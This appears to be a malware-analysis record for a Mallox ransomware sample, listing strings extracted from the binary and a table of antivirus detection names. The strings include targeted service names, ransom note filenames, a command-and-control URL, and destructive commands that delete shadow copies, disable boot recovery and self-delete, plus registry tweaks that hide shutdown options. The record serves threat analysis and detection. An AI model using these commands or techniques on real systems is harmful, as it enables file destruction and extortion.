TbossSystem
ErpEnvSvc
Mysoft.Autoupgrade.DispatchService
Mysoft.Autoupgrade.UpdateService
Mysoft.Config.WindowsService
Mysoft.DataCenterService
Mysoft.SchedulingService
Mysoft.Setup.InstallService
MysoftUpdate
edr_monitor
abs_deployer
savsvc
ShareBoxMonitorService
ShareBoxService
CloudExchangeService
EASService
KICkSvr
U8SmsSrv
OfficeClearCache
TurboCRM70
U8DispatchService
U8EISService
U8EncryptService
U8GCService
U8KeyManagePool
U8SCMPool
U8SLReportService
U8TaskService
UFAllNet
UFReportService
UTUService
.nvram
.oraenv
cmd.exe
admin$
%windir%
\\%s\%s\%s.exe
%s\%s.exe
HOW TO BACK FILES.txt
\\%s\%s
\\.\%c:
http://api.ipify.org
Content-Type: application/x-www-form-urlencoded
Host: api.ipify.org
http://91.215.85.135/QWEwqdsvsf/ap.php
Content-Type: application/x-www-form-urlencoded
Host:
/c ping 127.0.0.1 && del "%s" >> NUL
-queue
File not found OR Invalid argument
Cant create unique data...
C:\HOW TO RECOVER !!.TXT
/c bcdedit /set {current} bootstatuspolicy ignoreallfailures
/c bcdedit /set {current} recoveryenabled no
SeTakeOwnershipPrivilege
SeDebugPrivilege
window
Do NOT shutdown OR reboot your PC: this might damage your files permanently !
SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown
SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart
SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut
shutdownwithoutlogon
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
MaxConnectionTime
SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
MaxDisconnectionTime
MaxIdleTime
C:\Windows
\sysnative\vssadmin.exe
delete shadows /all /quiet
SOFTWARE\Raccine
SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
Read Error: %s
chunk_temp lower than ...
Set pos error: %s
Write error: %s
No permission: %s
In use another process: %s
Cant open: %s
%s: ReadFile code: %lu
%s: WriteFile code: %lu
%s: SetPos code: %lu

Antivirus Signature
Bkav W32.Common.AB1E3033
Lionic Trojan.Win32.Mallox.j!c
tehtris Clean
ClamAV Win.Ransomware.Mallox-10030404-0
CMC Clean
CAT-QuickHeal Ransom.Mallox.S33100643
Skyhigh BehavesLike.Win64.NetLoader.gh
ALYac Trojan.Ransom.Filecoder
Cylance Unsafe
Zillya Trojan.Filecoder.Win64.114260
Sangfor Ransom.Win32.Behaviour.swkaa
K7AntiVirus Trojan ( 005aa3791 )
Alibaba Ransom:Win64/Mallox.c8e74f9e
K7GW Trojan ( 005aa3791 )
Cybereason malicious.21da18
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win64/Filecoder.Mallox.A
APEX Malicious
Avast Win64:RansomX-gen [Ransom]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Ransom.Win32.Generic
BitDefender Gen:Variant.Lazy.436214
NANO-Antivirus Trojan.Win64.Encoder.knhmof
ViRobot Trojan.Win.Z.Mallox.489984.G
MicroWorld-eScan Gen:Variant.Lazy.436214
Tencent Trojan-Ransom.Win32.Mallox.kb
Sophos Troj/Mallox-B
F-Secure Heuristic.HEUR/AGEN.1372165
DrWeb Trojan.Encoder.38731
VIPRE Gen:Variant.Lazy.436214
TrendMicro Clean
McAfeeD ti!45A236E7AA80
Trapmine suspicious.low.ml.score
FireEye Generic.mg.71efe7a21da183c4
Emsisoft Gen:Variant.Lazy.436214 (B)
SentinelOne Static AI - Suspicious PE
GData Gen:Variant.Lazy.436214
Jiangmin Trojan.Generic.hsdeh
Webroot Clean
Varist W64/ABRisk.EOOZ-6139
Avira HEUR/AGEN.1372165
Antiy-AVL Trojan/Win32.Agent
Kingsoft Win32.Trojan-Ransom.Generic.a
Gridinsoft Ransom.Win64.AI.sa
Xcitium Clean
Arcabit Trojan.Lazy.D6A7F6
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Ransom.Win32.Generic
Microsoft Ransom:Win64/Mallox.CCCM!MTB
Google Detected
AhnLab-V3 Ransomware/Win.Mallox.R648404
Acronis Clean
McAfee Artemis!71EFE7A21DA1
TACHYON Ransom/W64.Agent.489984
VBA32 Trojan.Encoder
Malwarebytes Malware.AI.2098677504
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Ransom.OutSider!1.D74B (CLASSIC)
Yandex Trojan.Filecoder!IHsMoIPeGjo
Ikarus Trojan-Ransom.Mallox
MaxSecure Trojan.Malware.10307848.susgen
Fortinet W64/Mallox.A!tr.ransom
BitDefenderTheta Clean
AVG Win64:RansomX-gen [Ransom]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Ransomware:Win/Mallox.a72cd999

No IRMA results available.